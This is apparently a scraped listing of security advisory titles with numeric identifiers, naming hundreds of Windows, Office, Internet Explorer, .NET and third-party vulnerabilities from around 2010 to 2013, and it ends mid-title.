Visio Viewer Tree Object Type Confusion Error Lets Remote Users Execute Arbitrary Code [1028275] Microsoft Internet Explorer Use-After-Free Bugs Let Remote Users Execute Arbitrary Code [1028274] Windows USB Driver Memory Error Lets Physically Local Users Gain Elevated Privileges [1028273] Microsoft Silverlight Memory Pointer Dereference Lets Remote Users Execute Arbitrary Code [1028129] Windows NFS Server Null Dereference Lets Remote Users Deny Service [1028128] Windows TCP/IP Stack FIN WAIT Processing Flaw Lets Remote Users Deny Service [1028127] Windows Client-Server Run-time Subsystem Lets Local Users Gain Elevated Privileges [1028126] Windows Kernel Lets Local Users Gain Elevated Privileges [1028124] Windows Kernel-Mode Drivers Let Local Users Gain Elevated Privileges [1028123] Microsoft .NET Bug Lets Remote Users Execute Arbitrary Code and Bypass Security Restrictions [1028119] Microsoft DirectShow Media Decompression Flaw Lets Remote Users Execute Arbitrary Code [1028118] Windows OLE Automation Memory Allocation Error Lets Remote Users Execute Arbitrary Code [1028117] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code and Access Information Across Domains [1028116] Microsoft Internet Explorer Vector Markup Language Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1027949] Microsoft .NET Open Data (OData) Protocol Bug Lets Remote Users Deny Service [1027948] Microsoft System Center Configuration Manager Input Validation Flaws Permit Cross-Site Scripting Attacks [1027947] Windows TCP/IP Stack Lets Remote Users Downgrade SSL/TLS Sessions [1027946] Windows Kernel-Mode Drivers Bug Lets Local Users Gain Elevated Privileges [1027945] Microsoft .NET Flaws Let Remote Users Execute Arbitrary Code, Obtain Potentially Sensitive Information, and Bypass Security Restrictions [1027944] Windows Print Spooler Bug Lets Remote Users Execute Arbitrary Code [1027943] Microsoft XML Core Services (MSXML) XML Parsing Flaws Let Remote Users Execute Arbitrary Code [1027930] Microsoft Internet Explorer CDwnBindInfo Object Reuse Flaw Lets Remote Users Execute Arbitrary Code [1027870] Microsoft Internet Explorer Discloses Mouse Location to Remote Users [1027860] Windows IP-HTTPS Certificate Processing Flaw Lets Remote Users Bypass Security Restrictions [1027859] Microsoft DirectPlay Heap Overflow Lets Remote Users Execute Arbitrary Code [1027857] Microsoft Exchange Server RSS Feed Bug Lets Remote Users Deny Service [1027856] Windows Kernel-Mode Drivers Font Processing Flaw Lets Remote Users Execute Arbitrary Code [1027855] Windows File Handling Component Memory Error Lets Remote Users Execute Arbitrary Code [1027852] Microsoft Word RTF Parsing Error Lets Remote Users Execute Arbitrary Code [1027851] Microsoft Internet Explorer Multiple Use-After-Free Bugs Let Remote Users Execute Arbitrary Code [1027753] Microsoft .NET Flaws Let Remote Users Execute Arbitrary Code, Obtain Potentially Sensitive Information, and Bypass Security Restrictions [1027752] Microsoft Excel Buffer Overflow, Memory Corruption, and Use-After-Free Errors Let Remote Users Execute Arbitrary Code [1027751] Microsoft Internet Information Server (IIS) FTP Server Lets Remote Users Obtain Files and Local Users Obtain Passwords [1027750] Windows Kernel Multiple Bugs Let Remote Users Execute Arbitrary Code and Local Users Obtain Elevated Privileges [1027749] Microsoft Internet Explorer Multiple Use-After-Free Bugs Let Remote Users Execute Arbitrary Code [1027748] Windows Shell Briefcase Integer Overflow and Underflow Let Remote Users Execute Arbitrary Code [1027647] EMC NetWorker Module for Microsoft Applications Lets Remote Users Execute Arbitrary Code and Local Users Obtain Passwords [1027629] Microsoft Office InfoPath HTML Sanitizer Flaw Permits Cross-Site Scripting Attacks [1027628] Microsoft Office Communicator HTML Sanitizer Flaw Permits Cross-Site Scripting Attacks [1027627] Microsoft Lync HTML Sanitizer Flaw Permits Cross-Site Scripting Attacks [1027626] Microsoft SharePoint HTML Sanitizer Flaw Permits Cross-Site Scripting Attacks [1027625] Microsoft Groove Server HTML Sanitizer Flaw Permits Cross-Site Scripting Attacks [1027623] Microsoft SQL Server Input Validation Flaw in Reporting Services Permits Cross-Site Scripting Attacks [1027622] Windows Kernel Integer Overflow Lets Local Users Gain Elevated Privileges [1027621] Microsoft Works Heap Corruption Flaw Lets Remote Users Execute Arbitrary Code [1027620] Microsoft Kerberos Null Pointer Dereference Lets Remote Users Deny Service [1027618] Microsoft Word Memory Errors Let Remote Users Execute Arbitrary Code [1027583] Adobe AIR Applications and Adobe Software for Windows Have Compromised Certificates [1027555] Microsoft Internet Explorer Multiple Use-After-Free Bugs Let Remote Users Execute Arbitrary Code [1027541] Windows Phone Certificate Validation Flaw Lets Remote Users Spoof Secure E-mail Servers [1027538] Microsoft Internet Explorer execCommand Flaw Lets Remote Users Execute Arbitrary Code [1027522] Citrix XenApp Plug-in for Windows Lets Remote Users Execute Arbitrary Code [1027512] Microsoft System Center Configuration Manager Input Validation Flaw Permits Cross-Site Scripting Attacks [1027511] Microsoft Visual Studio Team Foundation Server Input Validation Flaw Permits Cross-Site Scripting Attacks [1027394] Microsoft Visio Buffer Overflow in Processing DXF Format Files Lets Remote Users Execute Arbitrary Code [1027393] Microsoft Office CGM Graphics File Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1027392] Microsoft JScript and VBScript Engine Integer Overflow Lets Remote Users Execute Arbitrary Code [1027391] Windows Kernel-Mode Drivers Bug Lets Local Users Gain Elevated Privileges [1027390] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code [1027379] Windows Print Spooler Remote Administration Protocol Format String and Buffer Overflows Let Remote Users Deny Service [1027378] Windows Remote Desktop RDP Processing Flaw Lets Remote Users Execute Arbitrary Code [1027335] Citrix Access Gateway Plug-in for Windows ActiveX Control Buffer Overflows Let Remote Users Execute Arbitrary Code [1027295] Microsoft SharePoint Server Bugs in Oracle Outside In Libraries Let Remote Users Execute Arbitrary Code [1027294] Microsoft Exchange Server Bugs in Oracle Outside In Libraries Let Remote Users Execute Arbitrary Code [1027234] Microsoft Office for Mac Folder Permission Flaw Lets Local Users Gain Elevated Privileges [1027233] Windows Schannel Lets Remote Users Decrypt TLS Traffic [1027232] Microsoft SharePoint Input Validation Flaws Permit Cross-Site Scripting, Information Disclosure, and URL Redirection Attacks [1027231] Windows Kernel-Mode Driver Bugs Lets Local Users Gain Elevated Privileges [1027230] Windows Shell Command Injection Flaw Lets Remote Users Execute Arbitrary Code [1027229] Microsoft Office DLL Loading Error Lets Remote Users Execute Arbitrary Code [1027228] Microsoft Visual Basic for Applications DLL Loading Error Lets Remote Users Execute Arbitrary Code [1027227] Microsoft Data Access Components (MDAC) ADO Cachesize Buffer Overflow Lets Remote Users Execute Arbitrary Code [1027226] Microsoft Internet Explorer Deleted Object Access Bugs Let Remote Users Execute Arbitrary Code [1027223] Microsoft IIS Web Server Discloses Potentially Sensitive Information to Remote Users [1027157] Microsoft XML Core Services (MSXML) Object Access Error Lets Remote Users Execute Arbitrary Code [1027155] Windows Kernel Bug in User Mode Scheduler Lets Local Users Gain Elevated Privileges [1027154] Windows Kernel-Mode Driver Bugs Lets Local Users Gain Elevated Privileges [1027151] Microsoft Dynamics AX Input Validation Flaw Permits Cross-Site Scripting Attacks [1027150] Microsoft Lync DLL Loading Error Lets Remote Users Execute Arbitrary Code [1027149] Microsoft .NET Memory Access Bug Lets Remote Users Execute Arbitrary Code [1027148] Windows Remote Desktop Bug Lets Remote Users Execute Arbitrary Code [1027147] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code, Conduct Cross-Site Scripting Attacks, and Obtain Potentially Sensitive Information [1027089] PHP Windows com_print_typeinfo() Buffer Overflow Lets Local Users Gain Elevated Privileges [1027048] Microsoft .NET Bugs Let Remote Users Execute Arbitrary Code and Deny Service [1027044] Windows TCP/IP Stack Lets Remote Users Bypass the Firewall and Local Users Gain Elevated Privileges [1027042] Microsoft Visio Viewer Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1027041] Microsoft Office Excel File Memory Corruption Errors and Heap Overflows Let Remote Users Execute Arbitrary Code [1027040] Microsoft Silverlight Double Free Memory Error Lets Remote Users Execute Arbitrary Code [1027039] Windows OS Lets Remote Users Cause Arbitrary Code to Be Executed and Lets Local Users Gain Elevated Privileges [1027038] Microsoft GDI+ Bugs Let Remote Users Execute Arbitrary Code [1027036] Microsoft .NET Framework Serialization Bugs Let Remote Users Execute Arbitrary Code [1027035] Microsoft Word RTF Processing Flaw Lets Remote Users Execute Arbitrary Code [1027020] Windows Win32k.sys Memory Error Lets Remote Users Deny Service [1027003] HP Insight Management Agents for Windows Server Bugs Permit Cross-Site Scripting, Cross-Site Request Forgery, and URL Redirection Attacks [1026911] Microsoft Office WPS File Heap Overflow Lets Remote Users Execute Arbitrary Code [1026910] Microsoft Works WPS File Heap Overflow Lets Remote Users Execute Arbitrary Code [1026909] Microsoft Forefront Unified Access Gateway Bugs Let Remote Users Obtain Potentially Sensitive Information and Conduct Browser Redirection Attacks [1026907] Microsoft .NET Parameter Validation Flaw Lets Remote Users Execute Arbitrary Code [1026906] Windows Authenticode Signature Verification Can Be Bypassed By Remote or Local Users [1026901] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code [1026794] Microsoft DirectWrite Unicode Character Processing Flaw Lets Remote Users Deny Service [1026793] Windows Kernel PostMessage() Lets Local Users Gain Elevated Privileges [1026792] Microsoft Visual Studio Lets Local Users Gain Elevated Privileges [1026791] Microsoft Expression Design DLL Loading Error Lets Remote Users Execute Arbitrary Code [1026790] Windows Remote Desktop Protocol Bugs Let Remote Users Deny Service and Execute Arbitrary Code [1026789] Microsoft DNS Server Lets Remote Users Deny Service [1026686] Microsoft SharePoint Input Validation Flaws Permit Cross-Site Scripting Attacks [1026684] Microsoft Visio Viewer Multiple Bugs Let Remote Users Execute Arbitrary Code [1026683] Windows XP Indeo Codec DLL Loading Error Lets Remote Users Execute Arbitrary Code [1026682] Windows Color Control Panel DLL Loading Error Lets Remote Users Execute Arbitrary Code [1026681] Microsoft Silverlight Bugs Let Remote Users Execute Arbitrary Code [1026680] Microsoft .NET Bugs Let Remote Users Execute Arbitrary Code [1026679] Windows Kernel Keyboard Layout Use-After-Free Lets Local Users Gain Elevated Privileges [1026678] Windows C Runtime Library Buffer Overflow Lets Remote Users Execute Arbitrary Code [1026677] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code and Obtain Potentially Sensitive Information [1026499] Microsoft Anti-Cross Site Scripting Library Flaw May Permit Cross-Site Scripting Attacks [1026498] Windows Schannel Lets Remote Users Decrypt SSL/TLS Traffic [1026495] Windows Client-Server Run-time Subsystem Unicode Processing Flaw Lets Local Users Gain Elevated Privileges [1026494] Windows Object Packager Lets Remote Users Execute Arbitrary Code [1026493] Windows Kernel Lets Local Users Bypass the SafeSEH Security Feature [1026492] Windows Media Player Bugs Let Remote Users Execute Arbitrary Code [1026479] Microsoft .NET Bugs Let Remote Users Execute Arbitrary Commands, Access User Accounts, and Redirect Users [1026469] Microsoft ASP.NET Hash Table Collision Bug Lets Remote Users Deny Service [1026450] Windows Win32k.sys GDI Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1026426] RSA SecurID Software Token for Windows DLL Loading Error Lets Remote Users Execute Arbitrary Code [1026418] Windows OLE Processing Error Lets Remote Users Cause Arbitary Code to Be Executed on the Target User's System [1026417] Windows Client-Server Run-time Subsystem Lets Local Users Gain Elevated Privileges [1026416] Microsoft Office IME (Chinese) Lets Local Users Gain Elevated Privileges [1026415] Windows Kernel Object Initialization Error Lets Local Users Gain Elevated Privileges [1026414] Microsoft Publisher Multiple Errors Let Remote Users Execute Arbitrary Code [1026413] Microsoft Internet Explorer DLL Loading Error Lets Remote Users Execute Arbitrary Code and HTML Processing Bugs Let Remote Users Obtain Information [1026412] Microsoft Active Directory Memory Access Error Lets Remote Authenticated Users Execute Arbitrary Code [1026411] Microsoft PowerPoint DLL Loading and OfficeArt Object Processing Flaws Let Remote Users Execute Arbitrary Code [1026410] Microsoft Office Excel File Memory Error Lets Remote Users Execute Arbitrary Code [1026409] Microsoft Office Use-After-Free Bug Lets Remote Users Execute Arbitrary Code [1026408] Microsoft Internet Explorer Error in Microsoft Time Component Lets Remote Users Execute Arbitrary Code [1026407] Windows Media Center DVR Parsing Error Lets Remote Users Execute Arbitrary Code [1026406] Windows Media Player DVR Parsing Error Lets Remote Users Execute Arbitrary Code [1026347] Windows Win32k.sys Keyboard Layout Bug Lets Local Users Deny Service [1026294] Microsoft Active Directory CRL Validation Flaw Lets Remote Users Bypass Authentication [1026293] Windows Mail DLL Loading Error Lets Remote Users Execute Arbitrary Code [1026292] Windows Meeting Space DLL Loading Error Lets Remote Users Execute Arbitrary Code [1026291] Windows Win32k.sys Kernel-Mode Drivers Array Index Validation Flaw Lets Remote Users Deny Service [1026290] Windows TCP/IP Stack Integer Overflow Lets Remote Users Execute Arbitrary Code [1026220] Microsoft Publisher 'Pubconv.dll' Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1026169] Microsoft Forefront Unified Access Gateway Input Validation Flaws Permits Cross-Site Scripting, HTTP Response Splitting, and Denial of Service Attacks [1026168] Microsoft Host Integration Server Bugs Let Remote Users Deny Service [1026166] Windows Media Center DLL Loading Error Lets Remote Users Execute Arbitrary Code [1026165] Windows Kernel-Mode Drivers Memory Corruption Errors Let Remote Users Execute Arbitrary Code and Local Users Deny Service and Gain Elevated Privileges [1026164] Microsoft Active Accessibility Component DLL Loading Error Lets Remote Users Execute Arbitrary Code [1026162] Microsoft .NET Inheritance Restriction Error Lets Remote Users Execute Arbitrary Code [1026161] Microsoft Silverlight Inheritance Restriction Error Lets Remote Users Execute Arbitrary Code [1026160] Microsoft Internet Explorer Multiple Flaws Let Remote Users Execute Arbitrary Code [1026040] Microsoft SharePoint Multiple Flaws Permit Cross-Site Scripting and Information Disclosure Attacks [1026039] Microsoft Office DLL Loading Error and Unspecified Bug Lets Remote Users Execute Arbitrary Code [1026038] Microsoft Excel Multiple Bugs Let Remote Users Execute Arbitrary Code [1026020] Windows 2008 R1 CSRSS Null Pointer Dereference Lets Local Users Deny Service [1026005] Windows Script Host DLL Loading Error Lets Remote Users Execute Arbitrary Code [1025905] Microsoft .NET Socket Trust Validation Error Lets Remote Users Obtain Information and Redirect Certain Network Traffic [1025904] Windows Kernel File Metadata Parsing Error Lets Remote Users Deny Service [1025903] Microsoft Visual Studio Input Validation Hole Permits Cross-Site Scripting Attacks [1025902] Microsoft ASP.NET Chart Control Remote File Disclosure [1025901] Windows Remote Desktop Protocol (RDP) Memory Access Error Lets Remote Users Deny Service [1025900] Windows TCP/IP Stack Flaws Let Remote Users Deny Service [1025899] Windows Client-Server Run-time Subsystem 'Winsrv.dll' Lets Local Users Gain Elevated Privileges [1025898] Windows Remote Access Service NDISTAPI Driver Lets Local Users Gain Elevated Privileges [1025897] Windows Remote Desktop Web Access Validation Flaw Permits Cross-Site Scripting Attacks [1025896] Microsoft Visio Memory Corruption Errors Let Remote Users Execute Arbitrary Code [1025895] Microsoft Data Access Components Insecure Library Loading Lets Remote Users Execute Arbitrary Code [1025894] Microsoft DNS Server Flaws Let Remote Users Execute Arbitrary Code and Deny Service [1025893] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code and Obtain Potentially Sensitive Information [1025885] Windows Client-Server Run-time Subsystem SrvGetConsoleTitle() Flaw Lets Local Users Deny Service [1025847] Microsoft Internet Explorer Flaw in Processing EUC-JP Encoded Characters Lets Remote Users Conduct Cross-Site Scripting Attacks [1025775] Citrix Access Gateway Plug-in for Windows Lets Remote Users Execute Arbitrary Code [1025763] Microsoft Visio May Load DLLs Unsafely and Remotely Execute Arbitrary Code [1025762] Windows Client-Server Run-time Subsystem Bugs Let Local Users Gain Elevated Privileges [1025761] Windows Kernel-Mode Drivers Let Local Users Gain Elevated Privileges [1025675] Microsoft Word Unspecified Flaw Lets Remote Users Execute Arbitrary Code [1025655] Microsoft MHTML Input Validation Hole Permits Cross-Site Scripting Attacks [1025654] Microsoft Internet Explorer Vector Markup Language (VML) Object Access Error Lets Remote Users Execute Arbitrary Code [1025653] Microsoft Active Directory Input Validation Flaw in Certificate Services Web Enrollment Permits Cross-Site Scripting Attacks [1025649] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code and Obtain Potentially Sensitive Information [1025648] Microsoft SQL Server XML Editor External Entity Resolution Flaw Lets Remote Users Obtain Potentially Sensitive Information [1025647] Microsoft Visual Studio XML Editor External Entity Resolution Flaw Lets Remote Users Obtain Potentially Sensitive Information [1025646] Microsoft Office InfoPath XML Editor External Entity Resolution Flaw Lets Remote Users Obtain Potentially Sensitive Information [1025645] Windows Server Message Block Request Parsing Flaw Lets Remote Users Deny Service [1025644] Microsoft Hyper-V VMBus Packet Validation Flaw Lets Local Users Deny Service [1025642] Microsoft Excel Multiple Bugs Let Remote Users Execute Arbitrary Code [1025641] Microsoft .NET JIT Compiler Validation Flaw Lets Remote Users Execute Arbitrary Code [1025640] Windows Server Message Block Parsing Error Lets Remote Users Execute Arbitrary Code [1025639] Microsoft Distributed File System Bugs Let Remote Users Deny Service and Execute Arbitrary Code [1025638] Windows Kernel Memory Corruption Error in Win32k.sys Lets Remote Users Execute Arbitrary Code [1025637] Microsoft Forefront Threat Management Gateway Bounds Validation Flaw in Winsock Provider Lets Remote Users Execute Arbitrary Code [1025636] Microsoft .NET Array Offset Error Lets Remote Users Execute Code [1025635] Microsoft Silverlight Array Offset Error Lets Remote Users Execute Arbitrary Code [1025513] Microsoft PowerPoint Memory Corruption Errors Let Remote Users Execute Arbitrary Code [1025431] HP Insight Control for Windows Lets Remote Authenticated Users Gain Elevated Privileges and Remote Users Conduct Cross-Site Request Forgery Attacks [1025360] Microsoft Reader Memory Corruption Errors Let Remote Users Execute Arbitrary Code [1025359] Microsoft MHTML Stack Overflow Lets Remote Users Execute Arbitrary Code [1025348] Windows Operating System Loader Driver Signing Restrictions Can Be Bypassed [1025347] Microsoft Fax Cover Page Editor Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1025346] Microsoft Foundation Classes May Load DLLs Unsafely and Remotely Execute Arbitrary Code [1025345] Windows Kernel win32k.sys Lets Local Users Gain Elevated Privileges [1025344] Microsoft WordPad Parsing Error Lets Remote Users Execute Arbitrary Code [1025343] Microsoft Office DLL Loading and Graphic Object Processing Flaws Let Remote Users Execute Arbitrary Code [1025340] Microsoft PowerPoint Bugs Let Remote Users Execute Arbitrary Code [1025337] Microsoft Excel Multiple Bugs Let Remote Users Execute Arbitrary Code [1025335] Microsoft GDI+ EMF Image Integer Overflow Lets Remote Users Execute Arbitrary Code [1025334] Microsoft OpenType Compact Font Format (CFF) Driver Stack Overflow Lets Remote Users Execute Arbitrary Code [1025333] Microsoft JScript and VBScript Engine Integer Overflow Lets Remote Users Execute Arbitrary Code [1025332] Windows DNS Resolution LLMNR Processing Flaw Lets Remote Users Execute Arbitrary Code and Local Users Gain Elevated Privileges [1025331] Microsoft .NET Stack Corruption Error in JIT Compiler Lets Remote Users Execute Arbitrary Code [1025329] Windows SMB Server Lets Remote Users Execute Arbitrary Code [1025328] Windows Server Message Block Parsing Errors Let Remote Users Execute Arbitrary Code [1025327] Microsoft Internet Explorer Bugs Let Remote Users Obtain Potentially Sensitive Information, Execute Arbitrary Code, and Hijack User Clicks [1025172] Windows Remote Desktop Client DLL Loading Error Lets Remote Users Execute Arbitrary Code [1025171] Microsoft Groove DLL Loading Error Lets Remote Users Execute Arbitrary Code [1025170] Microsoft DirectShow DLL Loading Error Lets Remote Users Execute Arbitrary Code [1025169] Windows Media Player and Windows Media Center Error in Parsing '.dvr-ms' Files Lets Remote Users Execute Arbitrary Code [1025164] Microsoft Internet Explorer Lets Remote Users Spoof the Address Bar [1025117] Microsoft Malware Protection Engine Registry Processing Error Lets Local Users Gain Elevated Privileges [1025086] Microsoft Active Directory Heap Overflow in Processing BROWSER ELECTION Packets May Let Remote Users Execute Arbitrary Code [1025049] Microsoft Local Security Authority Subsystem Service (LSASS) Lets Local Users Gain Elevated Privileges [1025048] Windows Kerberos Lets Local Users Gain Elevated Privileges [1025047] Windows Driver Flaws Lets Local Users Gain Elevated Privileges [1025046] Windows Kernel Lets Local Users Gain Elevated Privileges [1025045] Windows Client-Server Run-time Subsystem Lets Local Users Gain Elevated Privileges [1025044] Microsoft JScript and VBScript Disclose Information to Remote Users [1025043] Microsoft Visio Memory Corruption Error in Processing Visio Files Lets Remote Users Execute Arbitrary Code [1025042] Microsoft Active Directory SPN Collosions May Let Remote Authenticated Users Deny Service [1025038] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code [1025034] Windows OpenType Compact Font Format Bug Lets Remote Users Execute Arbitrary Code [1025003] Microsoft MHTML Input Validation Hole May Permit Cross-Site Scripting Attacks [1024948] Windows Backup Manager May Load DLLs Unsafely and Remotely Execute Arbitrary Code [1024947] Microsoft Data Access Components (MDAC) Memory Corruption Errors in Processing DSN Data and ADO Records Let Remote Users Execute Arbitrary Code [1024940] Microsoft Internet Explorer Use-After-Free in 'mshtml.dll' May Let Remote Users Execute Arbitrary Code [1024932] Windows Graphics Rendering Engine Stack Overflow in Processing Thumbnail Images Lets Remote Users Execute Arbitrary Code [1024925] Microsoft Fax Cover Page Editor Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1024922] Microsoft Internet Explorer Recursive CSS Import Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1024921] Microsoft IIS FTP Server Lets Remote Users Deny Service [1024888] Microsoft Exchange Server RPC Processing Flaw Lets Remote Authenticated Users Deny Service [1024887] Microsoft Office Graphics Filters Let Remote Users Execute Arbitrary Code [1024886] Microsoft SharePoint Input Validation Flaw in Processing SOAP Requests Let Remote Users Execute Arbitrary Code [1024885] Microsoft Publisher Bugs Let Remote Users Execute Arbitrary Code [1024884] Microsoft Hyper-V Input Validation Flaw Lets Local Guest Operating System Users Deny Service [1024883] Windows Netlogon Service Lets Remote Authenticated Users Deny Service [1024882] Windows Consent User Interface Lets Local Users Gain Elevated Privileges [1024881] Windows Routing and Remote Access NDProxy Buffer Overflow Lets Local Users Gain Elevated Privileges [1024880] Windows Kernel Buffer Overflows and Memory Corruption Errors Let Local Users Gain Elevated Privileges [1024878] Windows Address Book May Load DLLs Unsafely and Remotely Execute Arbitrary Code [1024876] Windows Media Encoder May Load DLLs Unsafely and Remotely Execute Arbitrary Code [1024875] Windows Movie Maker May Load DLLs Unsafely and Remotely Execute Arbitrary Code [1024873] Windows OpenType Font Driver Memory Corruption Flaws Let Remote Users Execute Arbitrary Code [1024872] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code and Conduct Cross-Domain Attacks [1024790] Microsoft Outlook Attachment Processing Flaw Lets Remote Users Deny Service [1024787] Windows Kernel Buffer Overflow in RtlQueryRegistryValues() Lets Local Users Gain Elevated Privileges [1024707] Microsoft Forefront Unified Access Gateway Input Validation Flaws Permit Cross-Site Scripting and URL Redirection Attacks [1024706] Microsoft PowerPoint Bugs Let Remote Users Execute Arbitrary Code [1024705] Microsoft Office Flaws Let Remote Users Execute Arbitrary Code [1024676] Microsoft Internet Explorer Freed Object Invalid Flag Reference Access Lets Remote Users Execute Arbitrary Code [1024675] HP Insight Control Performance Management for Windows Lets Remote Users Download Arbitrary Files [1024673] HP Insight Recovery for Windows Flaws Permit Cross-Site Scripting and Directory Traversal Attacks [1024672] HP Insight Control Performance Management for Windows Flaws Permit Cross-Site Scripting and Cross-Site Request Forgery Attacks and Let Remote Authenticated Users Gain Elevated Privileges [1024667] HP Insight Managed System Setup Wizard for Windows Lets Remote Users Download Arbitrary Files [1024630] Microsoft Internet Explorer 'window.onerror' Callback Lets Remote Users Obtain Information From Other Domains [1024572] Sun Java System Directory Server Identity Synchronization for Windows Lets Local Users Access and Modify Data and Deny Service [1024559] Microsoft SharePoint Input Validation Hole in SafeHTML Permits Cross-Site Scripting Attacks [1024558] Microsoft Cluster Service Disk Permission Flaw Lets Local Users Gain Elevated Privileges [1024557] Microsoft Foundation Classes Library Buffer Overflow in Window Title Lets Remote Users Execute Arbitrary Code [1024556] Windows Schannel TLSv1 Processing Bug Lets Remote Users Deny Service [1024555] Windows Shell COM Object Instantiation Error Lets Remote Users Execute Arbitrary Code [1024554] Windows OpenType Font (OTF) Format Driver Memory Corruption Flaw Lets Local Users Gain Elevated Privileges [1024553] Windows LPC Buffer Overflow Lets Local Users Gain Elevated Privileges [1024552] Microsoft Office Excel Has Multiple Flaws That Let Remote Users Execute Arbitrary Code [1024551] Microsoft Office Word Processing Flaws Let Remote Users Execute Arbitrary Code [1024550] Windows Media Player Object Deallocation Error Lets Remote Users Execute Arbitrary Code [1024549] Windows Common Control Library Heap Overflow Lets Remote Users Execute Arbitrary Code [1024547] Windows win32k.sys Kernel-mode Driver Bugs Let Local Users Gain Elevated Privileges [1024546] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code, Obtain Information, and Conduct Cross-Site Scripting Attacks [1024545] Windows Media Player Use-After-Free Memory Error in Network Sharing Service Lets Remote Users Execute Arbitrary Code [1024544] Windows Embedded OpenType Font Engine Integer Overflow Lets Remote Users Execute Arbitrary Code [1024543] Microsoft .NET Framework JIT Compiler Memory Access Error Lets Remote Users Execute Arbitrary Code [1024537] Windows LPC Processing Flaw Lets Local Users Deny Service [1024496] Microsoft Internet Information Server (IIS) Web Server Stack Overflow in Reading POST Data Lets Remote Users Deny Service [1024459] Microsoft ASP.NET Padding Oracle Attack Lets Remote Users Decrypt Data [1024445] Microsoft Outlook Web Access Authentication Flaw Lets Remote Users Hijack User Sessions [1024444] Windows Client-Server Runtime Subsystem Lets Local Users Gain Elevated Privileges [1024443] Microsoft Local Security Authority Subsystem Service (LSASS) Heap Overflow Lets Remote Authenticated Users Execute Arbitrary Code [1024442] Microsoft WordPad Parsing Error in Text Converters Lets Remote Users Execute Arbitrary Code [1024440] Microsoft Internet Information Services Bugs Let Remote Users Bypass Authentication, Deny Service, and Execute Arbitrary Code [1024439] Microsoft Outlook Heap Overflow Lets Remote Users Execute Arbitrary Code [1024438] Microsoft Office Unicode Font Parsing in USP10.DLL Lets Remote Users Execute Arbitrary Code [1024437] Windows Unicode Scripts Processor Font Parsing Error in USP10.DLL Lets Remote Users Execute Arbitrary Code [1024436] Windows MPEG-4 Codec Processing Flaw Lets Remote Users Execute Arbitrary Code [1024435] Windows Print Spooler Access Permission Flaw Lets Remote Users Execute Arbitrary Code [1024358] Windows TCP/IP Stack IcmpSendEcho2Ex() Bug Lets Local Users Deny Service [1024355] Windows Applications May Load DLLs Unsafely and Remotely Execute Arbitrary Code [1024345] Windows Kernel win32k!GreStretchBltInternal() Bug Lets Local Users Deny Service [1024320] Windows Telephony Application Programming Interfaces Lets Certain Local Users Gain Elevated Privileges [1024311] Windows TCP/IP Stack Lets Local Users Gain Elevated Privileges and Remote Users Deny Service [1024310] Microsoft Office Excel Flaw Lets Remote Users Execute Arbitrary Code [1024309] Windows Movie Maker Memory Corruption Error in Processing Project Files Lets Remote Users Execute Arbitrary Code [1024308] Windows Drivers Let Local Users Gain Elevated Privileges or Deny Service [1024307] Windows Kernel Bugs Let Local Users Gain Elevated Privileges and Deny Service [1024306] Microsoft Silverlight Memory Corruption Errors Let Remote Users Execute Arbitrary Code [1024305] Microsoft .NET Framework Virtual Method Delegate Processing Error Lets Remote Users Execute Arbitrary Code [1024304] Microsoft Cinepak Codec Memory Pointer Error Lets Remote Users Execute Arbitary Code [1024303] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code and Conduct Cross-Domain Attacks [1024302] Microsoft MPEG Layer-3 Codecs Stack Overflow Lets Remote Users Execute Arbitary Code [1024301] Microsoft XML Core Services (MSXML) HTTP Response Processing Flaw Lets Remote Users Execute Arbitrary Code [1024300] Windows Schannel Certificate Validation Error Lets Remote Users Execute Arbitrary Code [1024299] Windows Schannel Protocol Flaw in SSL Renegotiation May Let Remote Users Conduct Man-in-the-Middle Attacks [1024298] Microsoft Office Word RTF, Word, and HTML Processing Errors Let Remote Users Execute Arbitrary Code [1024297] Windows SMB Server Flaws Let Remote Users Deny Service and Execute Arbitrary Code [1024277] Citrix XenApp Online Plug-in for Windows Flaw Lets Remote Users Execute Arbitrary Code [1024189] Microsoft Office Outlook Validation Error in Processing Attachments Lets Remote Users Execute Arbitrary Code [1024188] Microsoft Office Access ActiveX Controls Let Remote Users Execute Arbitrary Code [1024186] HP Insight Control Server Migration for Windows Lets Remote Users Conduct Cross-Site Request Forgery Attacks and Local Users Gain Unauthorized Access to Data [1024084] Microsoft Help and Support Center URL Escaping Flaw Lets Remote Users Execute Arbitrary Commands [1024080] Microsoft .NET XML Digital Signature Flaw May Let Remote Users Bypass Authentication [1024079] Microsoft Internet Information Services Memory Allocation Error Lets Remote Authenticated Users Execute Arbitrary Code [1024078] Microsoft SharePoint Input Validation Flaw in toStaticHTML API Permits Cross-Site Scripting Attacks [1024077] Microsoft SharePoint Help Page Processing Bug Lets Remote Users Deny Service [1024076] Microsoft Office Excel Has Multiple Flaws That Let Remote Users Execute Arbitrary Code [1024075] Microsoft Office Open XML File Format Converter for Mac Lets Local Users Gain Elevated Privileges [1024074] Windows OpenType Compact Font Format Memory Corruption Error Lets Local Users Gain Elevated Privileges [1024073] Microsoft Office COM Object Instantiation Error Lets Remote Users Execute Arbitrary Code [1024072] Windows Kernel 'win32k.sys' Lets Local Users Gain Elevated Privileges [1024070] Microsoft Internet Explorer 8 Developer Tools ActiveX Control Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1024069] Windows Media Decompression Components Let Remote Users Execute Arbitrary Code [1024068] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code and Conduct Cross-Site Scripting Attacks [1023991] Windows Memory Error in Canonical Display Driver Lets Remote Users Execute Arbitrary Code [1023982] HP Insight Control Server Migration for Windows Input Validation Flaw Permits Cross-Site Scripting Attacks [1023975] Microsoft Office Memory 